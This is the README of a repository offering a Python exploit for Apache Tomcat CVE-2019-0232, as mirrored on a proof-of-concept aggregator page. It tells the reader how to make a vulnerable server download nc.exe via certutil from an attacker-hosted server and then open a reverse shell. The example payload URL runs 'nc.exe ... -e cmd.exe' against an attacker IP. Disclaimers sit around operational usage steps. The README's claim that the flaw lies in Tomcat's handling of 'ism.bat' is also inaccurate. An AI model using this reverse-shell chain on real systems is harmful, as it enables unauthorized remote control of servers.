来源

关联漏洞

描述

Hi this is a revised and enhanced code for CVE-2019-0232 

介绍

# **Exploit for Apache Tomcat CVE-2019-0232**

This script exploits the **CVE-2019-0232** vulnerability in Apache Tomcat, which allows remote code execution through the improper handling of the `ism.bat` script. The script leverages a reverse shell technique using `certutil` and `nc.exe` (Netcat) to gain remote access to the vulnerable system.

### **Vulnerability Overview:**
- **CVE ID**: CVE-2019-0232
- **Affected Products**: Apache Tomcat 6.x, 7.x, 8.x, and 9.x
- **Description**: 
  - **CVE-2019-0232** is a vulnerability in Apache Tomcat’s handling of requests to `ism.bat` that could allow attackers to execute arbitrary commands on the server. This vulnerability occurs due to a lack of proper validation of user input, allowing attackers to trigger the execution of arbitrary commands through a specially crafted request.
  - The vulnerability can be exploited to download a malicious `nc.exe` file from a remote server and use it to spawn a reverse shell.

### **Requirements:**
- **Python 3**: The script is designed for Python 3.x.
- **Netcat**: A Netcat listener (`nc.exe`) must be hosted on a server for the reverse shell connection.
- **Apache Tomcat**: The target server must be running a vulnerable version of Apache Tomcat (6.x, 7.x, 8.x, or 9.x) that is susceptible to CVE-2019-0232.

### **How It Works:**
1. **Download `nc.exe`**: The script sends a crafted request to the vulnerable Tomcat server to download the `nc.exe` (Netcat) file to the target machine using `certutil`.
2. **Reverse Shell**: Once `nc.exe` is downloaded, another request is sent to execute the reverse shell command, which connects back to the attacker's Netcat listener.

### **Usage:**

#### 1. Clone the repository:
```bash
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
```
#### 2. Edit the script or run it with user inputs:
```bash
python3 exploit.py
```
#### 3. You will be prompted to enter the following details:
```bash 
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
```
### Example:
```bash
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
```
Once executed successfully, you should have a reverse shell connection back to your Netcat listener.
### Disclaimer:
This script is intended for educational purposes only. Do not use it for malicious activities. Always obtain proper authorization before attempting any penetration testing or security auditing. Misuse of this script could result in legal consequences.

### Important Notes:
Ensure the Apache Tomcat server is not patched against CVE-2019-0232 before using this exploit.
The script may require administrative privileges depending on the target system's configuration.
#### Author:
Author: A!Z3N(Dharan)
Made with power!
### **License:**

This project is licensed under the **MIT License**. 

However, **use it at your own risk**. This code is provided for **educational purposes only**. By using this code, you agree to take full responsibility for any actions resulting from its use. Misuse or unauthorized use of this exploit may lead to legal consequences. **Always obtain proper authorization** before performing any security testing or penetration testing on any system.

You are free to use, modify, and distribute this code, but **only for ethical purposes**. The author is not responsible for any damage caused by this code. 

**Do not use this exploit without the explicit permission of the target system's owner.**

文件快照

 [4.0K]  /data/pocs/d075c5de4b07b2c7ce8d3433ea918162618dc2e9
├── [2.6K]  CVE-2019-0232.py
└── [3.9K]  README.md

0 directories, 2 files

备注